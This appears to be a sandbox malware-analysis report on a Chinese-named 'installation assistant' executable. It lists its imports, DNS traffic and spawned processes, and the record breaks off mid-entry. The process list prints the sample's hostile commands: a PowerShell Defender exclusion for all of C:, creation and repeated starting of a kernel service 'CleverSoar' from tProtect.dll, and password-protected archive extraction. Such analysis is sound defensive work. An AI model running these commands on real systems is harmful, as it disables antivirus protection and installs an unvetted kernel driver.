                            comctl32.dll | InitCommonControls
                            user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                            Name | Ordinal | Address
                            __dbk_fcall_wrapper | 2 | 0x40fc10
                            dbkFCallWrapperAddr | 1 | 0x4b063c
                            Language of compilation system | Country where language is spoken | Map
                            English | United States |
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 24, 2024 13:13:08.523574114 CET | 54318 | 53 | 192.168.2.7 | 1.1.1.1
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Dec 24, 2024 13:13:08.523574114 CET | 192.168.2.7 | 1.1.1.1 | 0x4c03 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Dec 24, 2024 13:13:08.661336899 CET | 1.1.1.1 | 192.168.2.7 | 0x4c03 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false

                            Target ID:0
                            Start time:07:13:02
                            Start date:24/12/2024
                            Path:C:\Windows\System32\SgrmBroker.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\SgrmBroker.exe
                            Imagebase:0x7ff6179d0000
                            File size:329'504 bytes
                            MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:1
                            Start time:07:13:02
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:2
                            Start time:07:13:02
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:07:13:03
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:4
                            Start time:07:13:03
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
                            Imagebase:0xd30000
                            File size:7'064'515 bytes
                            MD5 hash:87A72F4BE35EFF0B33E71D38146067B6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:6
                            Start time:07:13:04
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
                            Imagebase:0xcf0000
                            File size:3'366'912 bytes
                            MD5 hash:4E9D08C44F409F54940837360055C5AF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:07:13:04
                            Start date:24/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:07:13:04
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:07:13:07
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:10
                            Start time:07:13:13
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
                            Imagebase:0xd30000
                            File size:7'064'515 bytes
                            MD5 hash:87A72F4BE35EFF0B33E71D38146067B6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:11
                            Start time:07:13:14
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
                            Imagebase:0xa10000
                            File size:3'366'912 bytes
                            MD5 hash:4E9D08C44F409F54940837360055C5AF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:12
                            Start time:07:13:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff7fb730000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:14
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0xa70000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:18
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0xa70000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:07:13:20
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:07:13:20
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:07:13:20
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
